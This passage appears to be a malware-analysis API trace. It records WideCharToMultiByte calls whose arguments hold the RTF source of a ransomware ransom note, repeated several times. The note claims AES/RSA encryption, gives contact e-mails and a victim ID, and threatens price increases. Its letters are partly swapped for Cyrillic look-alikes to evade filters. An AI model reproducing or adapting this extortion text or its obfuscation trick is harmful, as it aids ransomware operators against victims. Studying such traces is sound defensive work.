\\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.476] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.477] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 